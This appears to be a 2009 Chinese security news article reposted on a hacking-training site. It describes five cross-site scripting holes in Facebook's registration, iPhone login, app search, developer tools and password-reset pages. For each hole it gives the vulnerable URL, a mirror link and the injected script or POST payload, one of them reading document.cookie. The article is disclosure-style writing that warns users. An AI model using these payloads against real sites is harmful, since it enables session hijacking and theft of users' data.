为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

详解Facebook最新高危XSS安全漏洞

2009-2-5 10:18| 投稿: security

摘要: 近期,Facebook惊现高危XSS安全漏洞,致使其用户遭受巨大威胁。本文将对这些漏洞发布进行详细介绍。Facebook在2008年12月15日与2009年1月4日被曝出一系列高危XSS安全漏洞,Fa...
近期,Facebook惊现高危XSS安全漏洞,致使其用户遭受巨大威胁。本文将对这些漏洞发布进行详细介绍。Facebook在2008年12月15日与2009年1月4日被曝出一系列高危XSS安全漏洞,Facebook众多的功能同时遭受牵连,如新用户注册、iPhone登录、密码重新设定,等等。 攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。拜这些高危跨站点脚本攻击漏洞所赐,Facebook用户可能受到钓鱼攻击并导致ID失窃。截至本月5号为止,这些漏洞尚未得到修复,这些高危漏洞已经对用户的隐私构成了高度的威胁。 安全研究人员最近发现的有XSS漏洞的页面包括,开发人员页面、新用户注册页面、iphone登录页面以及应用程序页面。攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。对于用户来说,为了远离这些威胁的攻击最好不要接受不认识的人员加为好友的请求,千万不要点击不明来源的链接。 原因是Facebook的个人概况中包含了许多个人信息,“好友”通过则这些信息足以发动有针对性的钓鱼攻击,或者向您发送有针对性的垃圾邮件。但是如果您点击了一个共享链接结果会怎样呢?很明显,对他们来说,您就不会有什么隐私了!!!为了安全和隐私起见,一定要注意您在社交网络上的个人简介。 下面我们对这些最新漏洞分析进行介绍: 1号XSS漏洞: 所在位置:http://www.new.facebook.com/r.php问题页面的镜像:http://www.xssed.com/mirror/50947/攻击性POST:reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar 2号XSS漏洞 所在位置:https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F问题页面的镜像:http://www.xssed.com/mirror/53885/攻击性POST:email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login 3号XSS漏洞 所在位置及攻击字符串:http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E问题页面的镜像:http://www.xssed.com/mirror/55268/ 4号XSS漏洞: 所在位置:http://developers.facebook.com/tools.php?fbml问题页面的镜像:http://www.xssed.com/mirror/55392/攻击性POST:profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=Hey you all! Our best wishes for 2009!!! :) ;) 5号XSS漏洞: 这是Facebook的Reset Password页面近期再次出现危险的跨站点脚本攻击安全漏洞。恶意用户可以网其中诸如代码并窃取数以百万计的Facebook用户的敏感个人信息。但愿这个漏洞能够得到迅速修复,好在以前他们的反应还是很迅速的。 所在位置:http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 问题页面的镜像:http://www.xssed.com/mirror/55951/

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部